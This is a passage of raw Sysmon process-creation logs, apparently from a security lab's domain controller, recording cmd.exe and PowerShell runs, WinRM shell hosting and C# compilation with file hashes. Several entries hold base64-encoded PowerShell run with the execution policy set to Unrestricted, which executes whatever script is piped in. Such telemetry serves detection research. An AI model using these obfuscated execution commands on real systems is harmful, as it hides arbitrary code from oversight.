AQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC4-6078-C802-00000000AD01}3272C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.344{A8622C2F-3DC4-6078-C802-00000000AD01}3272C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:07.527{A8622C2F-3DC3-6078-C702-00000000AD01}3636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESEE20.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC6A2689BA380C47528EDB8FACAF5F1D8E.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-3DC3-6078-C602-00000000AD01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\dm2idsto.cmdline" 154100x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:07.331{A8622C2F-3DC3-6078-C602-00000000AD01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\dm2idsto.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-3DC1-6078-C402-00000000AD01}4040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:05.957{A8622C2F-3DC1-6078-C502-00000000AD01}5000C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{A8622C2F-3DC1-6078-C402-00000000AD01}4040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:05.813{A8622C2F-3DC1-6078-C402-00000000AD01}4040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DBF-6078-C302-00000000AD01}4504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:03.354{A8622C2F-3DBF-6078-C302-00000000AD01}4504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DBF-6078-C202-00000000AD01}5052C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:03.341{A8622C2F-3DBF-6078-C202-00000000AD01}5052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 